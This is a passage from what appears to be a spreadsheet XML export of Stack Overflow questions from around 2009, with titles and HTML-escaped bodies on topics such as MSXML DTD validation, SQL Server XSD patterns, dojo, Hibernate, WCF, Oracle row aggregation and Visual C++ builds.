&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version = "1.0"?&amp;gt;  
&amp;lt;!DOCTYPE sample SYSTEM "sample.dtd"&amp;gt;  
&amp;lt;Root&amp;gt;  
...  
&amp;lt;/Root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The research I did lead me to believe that the Load would validate the XML if the XML pointed to the DTD via the doc type.&lt;br /&gt;
I've done a lot of research and cant figure out where I'm going wrong. It could be as simple as the DTD provided isn't syntactically correct, which I'm looking over now. The resources I've found are mostly on MSDN and here &lt;a href="http://www.jalix.org/ressources/internet/dom/~vrac/articles/XML%20DOM.html" rel="nofollow"&gt;http://www.jalix.org/ressources/internet/dom/~vrac/articles/XML%20DOM.html&lt;/a&gt;.&lt;br /&gt;
Both the xml and dtd are located in the same directory, and I have it parsing the XML with out the doctype tag.&lt;/p&gt;
&lt;p&gt;The error I get is:&lt;br /&gt;
Error #: -2146697211: The system cannot locate the resouce specified.
error processing resource 'sample.dtd'&lt;/p&gt;
&lt;p&gt;Any additional resources, or suggestions would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server won't perform regular expression validation on XML column</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an XML column in my table which contains this xsd snippet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsd:element name="Postcode" minOccurs="0"&amp;gt;
    &amp;lt;xsd:simpleType&amp;gt;
        &amp;lt;xsd:restriction base="xsd:string"&amp;gt;
            &amp;lt;xsd:pattern value="^[0-9]{4}$" /&amp;gt;
        &amp;lt;/xsd:restriction&amp;gt;
    &amp;lt;/xsd:simpleType&amp;gt;
&amp;lt;/xsd:element&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The regular expression should require a string containing 4 numerical digits.  It validates perfectly in Visual Studio and is a correct regular expression.&lt;/p&gt;
&lt;p&gt;SQL Server, on the other hand, won't accept it.  The error message I receive is: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XML Validation: Invalid simple type value: '1234'. Location: / * : Donor[1]/*:Postcode[1].
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have an email address regex working fine, but can't get this simple numerical regex to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dojo.require issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having trouble configuring my initial installation of dojo to include the widget framework correctly. &lt;/p&gt;
&lt;p&gt;Following most of the code I see, including dijit should look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dojo.require("dijit");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and that's that. Unfortunately, that doesn't seem to work. &lt;/p&gt;
&lt;p&gt;Using this initializes the widgets correctly, but there's some weird behavior from the standard dijit methods that makes me think that I'm doing it wrong:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dojo.require("dijit.dijit");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an element of configuring dojo that I'm missing? The files are all placed as they are in the 1.2.3 distribution, underneath another javascript folder.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use data with variable structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Imagine a system that works with data, which structure changes over time. Say, for example, today your User object contains Name : String and Email : String, but tomorrow you need to add Age : Integer and Address which consists of Country, Zip code, etc. Then you may want to create new field User.Contacts and move Email and Address to that field, like refactoring.
And it should be done in runtime, without coding and redeployment, because it will be done by customers or administrators, not developers.&lt;/p&gt;
&lt;p&gt;What approaches and tools would you consider for storing such data? Will it be separate table for each class of objects and altering table each time structure is changed, or 1-to-many relationship between object and it's property values (like table StringProperties with fields ObjectID, PropertyID, StringValue); or one big table for all objects (with generic fields StringField1, NumericField2, etc)&lt;/p&gt;
&lt;p&gt;How would you make indexing work?&lt;/p&gt;
&lt;p&gt;Would you consider using less mainstream tools like CouchDB? Are there any other tools I should know about?&lt;/p&gt;
&lt;p&gt;Are there any existing examples of application with similar idea - allowing users to define and augment their own data structures?&lt;/p&gt;
&lt;p&gt;EDIT: I do not expect anyone to solve my entire design problem. Rough ideas or links to tools like CouchDB or Prevayler are more than welcome. Any article links are welcome too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate session handling in spring web services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using spring-ws with Jaxb2Marshaller, PayloadRootAnnotationMethodEndpointMapping and GenericMarshallingMethodEndpointAdapter to configure my web services via the @Endpoint and @PayloadRoot annotations.&lt;/p&gt;
&lt;p&gt;When I try to use the DAO's of my project I am able to load objects from the database but as soon as I try to access properties inside my service that should be lazily loaded I get a org.hibernate.LazyInitializationException - could not initialize proxy - no Session.&lt;/p&gt;
&lt;p&gt;In my spring-mvc web application the OpenSessionInViewInterceptor handles the sessions. How do I configure my web service project to automatically create a Hibernate session for every web service call? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use msxml with Visual Studio 2008 Express (no ATL classes) without becoming crazy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is not really a question because I have already found a solution. It took me a lot of time, that's why I want to explain it here.&lt;/p&gt;
&lt;p&gt;Msxml is based on COM so it is not really easy to use in C++ even when you have helpful classes to deal with memory allocation issues. But writing a new XML parser would be much more difficult so I wanted to use msxml.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I was able to find enough examples on the internet to use msxml with the help of &lt;code&gt;CComPtr&lt;/code&gt; (smart pointer to avoid having to call Release() for each IXMLDOMNode manually), &lt;code&gt;CComBSTR&lt;/code&gt; (to convert C++ strings to the COM format for strings) and &lt;code&gt;CComVariant&lt;/code&gt;. This 3 helpful classes are ATL classes and need an &lt;code&gt;#include &amp;lt;atlbase.h&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Problem: Visual Studio 2008 Express (the free version) doesn't include ATL.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Use &lt;code&gt;comutil.h&lt;/code&gt; and &lt;code&gt;comdef.h&lt;/code&gt;, which include some simple helper classes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;_bstr_t&lt;/code&gt; replaces more or less &lt;code&gt;CComBSTR&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;_variant_t&lt;/code&gt; replaces more or less &lt;code&gt;CComVariant&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;_com_ptr_t&lt;/code&gt; replaces indirectly &lt;code&gt;CComPtr&lt;/code&gt; through the use of &lt;code&gt;_COM_SMARTPTR_TYPEDEF&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Small example:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;msxml.h&amp;gt;
#include &amp;lt;comdef.h&amp;gt;
#include &amp;lt;comutil.h&amp;gt;
// Define some smart pointers for MSXML
_COM_SMARTPTR_TYPEDEF(IXMLDOMDocument,     __uuidof(IXMLDOMDocument));     // IXMLDOMDocumentPtr
_COM_SMARTPTR_TYPEDEF(IXMLDOMElement,      __uuidof(IXMLDOMElement));      // IXMLDOMElementPtr
_COM_SMARTPTR_TYPEDEF(IXMLDOMNodeList,     __uuidof(IXMLDOMNodeList));     // IXMLDOMNodeListPtr
_COM_SMARTPTR_TYPEDEF(IXMLDOMNamedNodeMap, __uuidof(IXMLDOMNamedNodeMap)); // IXMLDOMNamedNodeMapPtr
_COM_SMARTPTR_TYPEDEF(IXMLDOMNode,         __uuidof(IXMLDOMNode));         // IXMLDOMNodePtr
void test_msxml()
{
	// This program will use COM
	CoInitializeEx(NULL, COINIT_MULTITHREADED);
	{
		// Create parser
		IXMLDOMDocumentPtr pXMLDoc;
		HRESULT hr = CoCreateInstance(__uuidof (DOMDocument), NULL, CLSCTX_INPROC_SERVER, IID_IXMLDOMDocument, (void**)&amp;amp;pXMLDoc);
		pXMLDoc-&amp;gt;put_validateOnParse(VARIANT_FALSE);
		pXMLDoc-&amp;gt;put_resolveExternals(VARIANT_FALSE);
		pXMLDoc-&amp;gt;put_preserveWhiteSpace(VARIANT_FALSE);
		// Open file
		VARIANT_BOOL bLoadOk;
		std::wstring sfilename = L"testfile.xml";
		hr = pXMLDoc-&amp;gt;load(_variant_t(sfilename.c_str()), &amp;amp;bLoadOk);
		// Search for node &amp;lt;testtag&amp;gt;
		IXMLDOMNodePtr pNode;
		hr = pXMLDoc-&amp;gt;selectSingleNode(_bstr_t(L"testtag"), &amp;amp;pNode);
		// Read something
		_bstr_t bstrText;
		hr = pNode-&amp;gt;get_text(bstrText.GetAddress());
		std::string sSomething = bstrText;
	}
	// I'm finished with COM
	// (Don't call before all IXMLDOMNodePtr are out of scope)
	CoUninitialize();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>WCF Fails Under Load - MessageSecurityException</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am load testing my website.  The site calls to a WCF service running on the same box using clientCredentialType="Windows".  Everything works until I reach a certain load (which is not even very high), then I get the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.ServiceModel.Security.MessageSecurityException:
  The HTTP request was forbidden with
  client authentication scheme
  'Anonymous'. ----&gt;
  System.Net.WebException: The remote
  server returned an error: (403)
  Forbidden.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Upon each call I create a channel:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var proxy = (IClientChannel)channelFactory.CreateChannel();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On success, I close:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;proxy.Close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On error, I abort:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;proxy.Abort();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas what's going on?  What I can do to handle loads better?  What to look for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best approach for decoupled database design in terms of data sharing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a series of Oracle databases that need to access each other's data. The most efficient way to do this is to use database links - setting up a few database links I can get data from A to B with the minimum of fuss. The problem for me is that you end up with a tightly-coupled design and if one database goes down it can bring the coupled databases with it (or perhaps part of an application on those databases).&lt;/p&gt;
&lt;p&gt;What alternative approaches have you tried for sharing data between Oracle databases?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update after a couple of responses...&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I wasn't thinking so much a replication, more on accessing "master data". For example, if I have a central database with currency conversion rates and I want to pull a rate into a separate database (application). For such a small dataset igor-db's suggestion of materialized views over DB links would work beautifully. However, when you are dynamically sampling from a very large dataset then the option of locally caching starts to become trickier. What options would you go for in these circumstances. I wondered about an XML service but tuinstoel (in a comment to le dorfier's reply) rightly questioned the overhead involved.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary of responses...&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;On the whole I think igor-db is closest, which is why I've accepted that answer, but I thought I'd add a little to bring out some of the other answers.&lt;/p&gt;
&lt;p&gt;For my purposes, where I'm looking at data replication only, it looks like Oracle BASIC replication (as opposed to ADVANCED) replication is the one for me. Using materialized view logs on the master site and materialized views on the snapshot site looks like an excellent way forward.&lt;/p&gt;
&lt;p&gt;Where this isn't an option, perhaps where the data volumes make full table replication an issue, then a messaging solution seems the most appropriate Oracle solution. Oracle Advanced Queueing seems the quickest and easiest way to set up a messaging solution.&lt;/p&gt;
&lt;p&gt;The least preferable approach seems to be roll-your-own XML web services but only where the relative ease of Advanced Queueing isn't an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I read system information in Python on OS X?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Following from this &lt;a href="http://stackoverflow.com/questions/466684/how-can-i-return-system-information-in-python"&gt;OS-agnostic question&lt;/a&gt;, specifically &lt;a href="http://stackoverflow.com/questions/466684/how-can-i-return-system-information-in-python#467291"&gt;this response&lt;/a&gt;, similar to data available from the likes of /proc/meminfo on Linux, how can I read system information from OS X using Python (including, but not limited to memory usage).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I deploy a django appserver as an egg, running behind fastcgi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to run a django appserver behind apache/fastcgi.  That's no problem, django does that out of the box.&lt;/p&gt;
&lt;p&gt;I want this appserver to be deployable via setuptools.  That is, I will make it as an egg and install it with easy_install.  And that part I can also handle, even though setuptools is not a standard complement to a django appserver.&lt;/p&gt;
&lt;p&gt;But what I can't figure out is how the dispatch.fcgi would actually call into this my_app.egg to "start" the server process.  Has anyone ever run in this config before?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compiler Error when adding dll reference to managed c++ project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using VS 2008 and get compiler errors sporadically when adding a dll reference to a managed c++ file in my C++ project. I am trying to add a reference to the dll so as to be able to use smart pointers. 
&lt;strong&gt;ex: #import items.tlb&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The problem is that the compiler crashes at sporadic places inside of &lt;strong&gt;items.tlh&lt;/strong&gt; almost as though chunks of bytes  where erased of missings , but when i open the file i can't find any reference to the aforementioned errors. &lt;/p&gt;
&lt;p&gt;I tried to rebuild the whole project several times, tried on different machine, but although the compiler errors are not consistents and disappear alltogether sometimes , a fresh rebuild sometimes brings back the problem. I was told that the size of the generated &lt;strong&gt;.tlh&lt;/strong&gt; file may be a reason but it doesn't really solve my problem or point me in the right direction.&lt;/p&gt;
&lt;p&gt;Did anybody experienced the same symptoms?
Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Perl equivalent of Python's re.findall/re.finditer (iterative regex results)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Python compiled regex patterns &lt;a href="http://docs.python.org/library/re.html#re.findall"&gt;have a &lt;code&gt;findall&lt;/code&gt; method&lt;/a&gt; that does the following:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Return all non-overlapping matches of
  pattern in string, as a list of
  strings. The string is scanned
  left-to-right, and matches are
  returned in the order found. If one or
  more groups are present in the
  pattern, return a list of groups; this
  will be a list of tuples if the
  pattern has more than one group. Empty
  matches are included in the result
  unless they touch the beginning of
  another match.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What's the canonical way of doing this in Perl? A naive algorithm I can think of is along the lines of "while a search and replace with the empty string is successful, do [suite]". I'm hoping there's a nicer way. :-)&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In what situation should the built-in 'operator' module be used in python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm speaking of this module:
&lt;a href="http://docs.python.org/library/operator.html"&gt;http://docs.python.org/library/operator.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;From the article:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The operator module exports a set of
  functions implemented in C
  corresponding to the intrinsic
  operators of Python. For example,
  operator.add(x, y) is equivalent to
  the expression x+y. The function names
  are those used for special class
  methods; variants without leading and
  trailing __ are also provided for
  convenience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm not sure I understand the benefit or purpose of this module.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to restructure this code hierarchy (relating to the Law of Demeter)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a game engine where I'm splitting off the physics simulation from the game object  functionality. So I've got a pure virtual class for a physical body&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Body
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;from which I'll be deriving various implementations of a physics simulation. My game object class then looks like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class GameObject {
public:
   // ...
private:
   Body *m_pBody;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I can plug in whatever implementation I need for that particular game. But I may need access to all of the &lt;code&gt;Body&lt;/code&gt; functions when I've only got a &lt;code&gt;GameObject&lt;/code&gt;. So I've found myself writing tons of things like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Vector GameObject::GetPosition() const { return m_pBody-&amp;gt;GetPosition(); }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm tempted to scratch all of them and just do stuff like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pObject-&amp;gt;GetBody()-&amp;gt;GetPosition();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this seems wrong (i.e. violates the Law of Demeter). Plus, it simply pushes the verbosity from the implementation to the usage. So I'm looking for a different way of doing this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specifying connection string in config file for a class library and re-use/modify in ASP.NET Web Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can one specify the connection string in a config file of a class library and later modify this when used in a ASP.NET Web Application?&lt;/p&gt;
&lt;p&gt;The Class library is a data access layer that has a Dataset connecting to a database based on a connection string specified in a config file (Settings.settings/app.config).&lt;/p&gt;
&lt;p&gt;This class library is used in a web application where user inputs data and is written to the database using the DAL classes &amp;amp; methods exposed in the class library.&lt;/p&gt;
&lt;p&gt;Now, I want to migrate this application from development environment to testing environment and later to production. The problem I'm facing is that after migrating to testing, the app in testing still connects to development database. I've changed the connection string mentioned in &lt;strong&gt;&amp;lt;class library&amp;gt;.dll.config&lt;/strong&gt; file but this seems to have no impact. &lt;/p&gt;
&lt;p&gt;Can someone explain the right way to achieve this? Thanks in advance for any help. Cheers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to display a panel or div in between gridview rows on RowCommand event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currentaly I am using a gridView and on RowCommand event of gridview the details of selected row are displayed below the Gridview. But now I have to display the details just below the row clicked. Means it will be displayed in between the selected row and next row of it. The gridview code is as &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;asp:GridView ID ="gvUserDataReadOnly" AutoGenerateColumns ="false" runat ="server"   OnRowCommand ="gvUserDataReadOnly_RowCommand"  DataKeyNames ="Guid"&amp;gt;
        &amp;lt;Columns &amp;gt;
            &amp;lt;asp:ButtonField ItemStyle-Width ="100px" DataTextField ="FirstName" HeaderText ="&amp;lt;%$ Resources:StringsRes,pge_ContactManager_FirstName %&amp;gt;" SortExpression ="FiratName" CommandName ="show_Details" ButtonType ="link" /&amp;gt;
            &amp;lt;asp:ButtonField ItemStyle-Width ="100px" DataTextField ="LastName" HeaderText ="&amp;lt;%$ Resources:StringsRes,pge_ContactManager_LastName %&amp;gt;" SortExpression ="LastName" CommandName ="show_Details" ButtonType ="link" /&amp;gt;                
            &amp;lt;asp:BoundField ItemStyle-Width ="100px" DataField ="TypeName" HeaderText ="&amp;lt;%$ Resources:StringsRes,pge_ContactManager_TypeName %&amp;gt;" SortExpression ="TypeId" /&amp;gt;
        &amp;lt;/Columns&amp;gt;
        &amp;lt;RowStyle Height="25px" /&amp;gt;
        &amp;lt;HeaderStyle Height="30px"/&amp;gt;
    &amp;lt;/asp:GridView&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and div tag which i want to display in betwwen rows is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id ="dvUserDatails" runat ="server" visible ="false" class ="eventcontent"&amp;gt;
        &amp;lt;h2&amp;gt;&amp;lt;asp:Literal ID ="ltUserName" runat ="server" &amp;gt;&amp;lt;/asp:Literal&amp;gt;&amp;lt;/h2&amp;gt;
        &amp;lt;asp:Label Text ="Type : " runat ="server" ID ="Type"&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;asp:Literal ID ="ltType" runat ="server" &amp;gt;&amp;lt;/asp:Literal&amp;gt;&amp;lt;br /&amp;gt;
        &amp;lt;asp:Label Text ="Address : " runat ="server" ID ="Address"&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;asp:Literal ID ="ltAddress" runat ="server" &amp;gt;&amp;lt;/asp:Literal&amp;gt;&amp;lt;br /&amp;gt;
        &amp;lt;asp:Label Text ="Phone No : " runat ="server" ID ="PhoneNo"&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;asp:Literal ID ="ltPhoneNo" runat ="server" &amp;gt;&amp;lt;/asp:Literal&amp;gt;&amp;lt;br /&amp;gt;
        &amp;lt;asp:Label Text ="Mobile No : " runat ="server" ID ="MobNo"&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;asp:Literal ID ="ltMobNo" runat ="server" &amp;gt;&amp;lt;/asp:Literal&amp;gt;&amp;lt;br /&amp;gt;
        &amp;lt;asp:Label Text ="Email Id : " runat ="server" ID ="emailId"&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;asp:Literal ID ="ltemail" runat ="server" &amp;gt;&amp;lt;/asp:Literal&amp;gt;&amp;lt;br /&amp;gt;
    &amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can't use EditItem Template as I am not using Edit button of gridview. Can anyone tell me how to do this task? Any other way to do this? Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you run Android instrumentation tests from Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently I'm running instrumentations tests from the command line this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;adb shell am instrument -w com.blah.blah/android.test.InstrumentationTestRunner
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to run them from Eclipse (with automatic installation of the application)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A Regex to match a SHA1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to match SHA1's in generic text with a regular expression.&lt;/p&gt;
&lt;p&gt;Ideally I want to avoid matching words. &lt;/p&gt;
&lt;p&gt;It's safe to say that full SHA1's have a distinctive pattern (they're long and a consistent length) - so I can match these reliably - but what about abbreviated SHA1's?&lt;/p&gt;
&lt;p&gt;Can I rely on the presence of numbers?&lt;/p&gt;
&lt;p&gt;Looking at the SHA1's in my commit log - numbers always appear in the first 3 characters. But is this too short? How many characters of SHA1 do I need to consider before I can assume a number would have appeared?  &lt;/p&gt;
&lt;p&gt;This does not have to be 100% accurate - I just need to match an abbreviated SHA1 99% of the time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any reason to use DataSets with Local Databases with SQL Server CE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does it make sense to use .NET DataSets even in applications that use a local in-process database for application data persistence?&lt;/p&gt;
&lt;p&gt;If DataSets are mainly meant for in-memory caching of database results, it sounds like they're not so beneficial when using something like SQL Server Compact local database that runs in the same process as the application.&lt;/p&gt;
&lt;p&gt;Are there any other reasons to use typed DataSets?  Say, do they ease WPF data binding?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to automatically sort the using directives alphabetically in Visual Studio 2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is &lt;a href="http://msdn.microsoft.com/en-us/library/bb514113.aspx" rel="nofollow"&gt;this option&lt;/a&gt; available in Visual Studio 2008.&lt;/p&gt;
&lt;p&gt;Is there a similar option in Visual Studio 2005? Or something else that would accomplish such a task? An add-in, maybe?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I refer to Team Foundation Server builds?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a release of my project using tfs build which generates a unique identity for the build in tfs build explorer such as "MyProject_20090122.1" indicating that this is the first build on 2009-01-22. However this is my release 1.0.0 of MyProject. Is there a way to connect the two identifiers or do I have to maintain the mapping externally and elsewhere?&lt;/p&gt;
&lt;p&gt;Should I make my version identifier confirm to the way the tfs build names so that my version number for the above should be 1.0.20090122.1?&lt;/p&gt;
&lt;p&gt;Is there a way to add comments to a tfsbuild?&lt;/p&gt;
&lt;p&gt;How do you do it?&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;As some have suggested the version number can be updated via msbuild and automatically incremented. The question however is how do I determine which version a specific team build is as the version number is not embedded in the build name? Can I control the identifiers for the tfs build name?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ob_get_contents equivalent in asp</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working on an old site in asp classic.
I want to write a function that returns some html.
Right now I'm reduced to writing everything in a string.&lt;/p&gt;
&lt;p&gt;The downsides are: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have to escape quotes&lt;/li&gt;
&lt;li&gt;There is no code completion on the tags nor attributes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In php I know how to get the contents of the output buffer with ob_get_contents. Is there an equivalent function in asp classic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should i use @property for Controller Classes variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Question is should i use properties for my view controllers?&lt;/p&gt;
&lt;p&gt;Consider the following case:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I have a view controller object in my parent class: MyViewController *myVC;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I don't release this view controller in parent class's &lt;em&gt;dealloc&lt;/em&gt; method.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I use view controller like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Allocate and Initialize view controller
myVC = [[MyViewController alloc] initWithNibName:@"newView" bundle:nil];
// Push View Controller
[self.navigationController pushViewController:myVC animated:YES];
// Release memory
[myVC release];
myVC = nil;
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is there any problem with this approach? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free code coverage tools in .NET for personal project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a free code coverage tools in .NET for personal project. NCover is bit expensive for person use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the data in a System.Object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a COM object that has a function called GetImage.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.pdf-tools.com/asp/products.asp?name=P2IA" rel="nofollow"&gt;http://www.pdf-tools.com/asp/products.asp?name=P2IA&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When I use it in Visual Studio 2008 it returns byte[], but when I use it in RAD Studio 2007 it returns System.Object. How can I get the data from the System.Object into a byte[]?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: How to hide ListBox control vertical scrollbar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tried CSS: overflow: auto. It doesn't work. Any way to achieve it?&lt;/p&gt;
&lt;p&gt;Do I need to create my custom control as I have seen it on ASP.NET forum?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I combine multiple rows into a comma-delimited list in Oracle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select * from countries
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with the following results:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;country_name
------------
Albania
Andorra
Antigua
.....
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to return the results in one row, so like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Albania, Andorra, Antigua, ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Of course, I can write a PL/SQL function to do the job (I already did in Oracle 10g), but is there a nicer, preferably non-Oracle-specific solution (or may be a built-in function) for this task?&lt;/p&gt;
&lt;p&gt;I would generally use it to avoid multiple rows in a sub-query, so if a person has more then one citizenship, I do not want her/him to be a duplicate in the list.&lt;/p&gt;
&lt;p&gt;My question is based on the similar question on &lt;a href="http://stackoverflow.com/questions/180032/how-can-i-combine-multiple-rows-into-a-comma-delimited-list-in-sql-server-2005"&gt;SQL server 2005&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;:
My function looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE OR REPLACE FUNCTION APPEND_FIELD (sqlstr in varchar2, sep in varchar2 ) return varchar2 is
ret varchar2(4000) := '';
TYPE cur_typ IS REF CURSOR;
rec cur_typ;
field varchar2(4000);
begin
     OPEN rec FOR sqlstr;
     LOOP
         FETCH rec INTO field;
    	 EXIT WHEN rec%NOTFOUND;
         ret := ret || field || sep;
     END LOOP;
     if length(ret) = 0 then
          RETURN '';
     else
          RETURN substr(ret,1,length(ret)-length(sep));
     end if;
end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it safe to use incremental rebuild for generating release build in visual C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I sometimes have issues with the incremental rebuild on visual C++ (2003 currently ). Some dependencies does not seem correctly checked and some files aren't build when they should. I suppose thoses issues come from the timestamp approach to incremental rebuild.&lt;/p&gt;
&lt;p&gt;I don't consider it a huge issue when building debug build on my desk, however for distribuable build this is a issue.&lt;/p&gt;
&lt;p&gt;Is it safe to use incremental build for a build server or is a full build a requirement ?&lt;/p&gt;
</t>
  </si>
  <si>
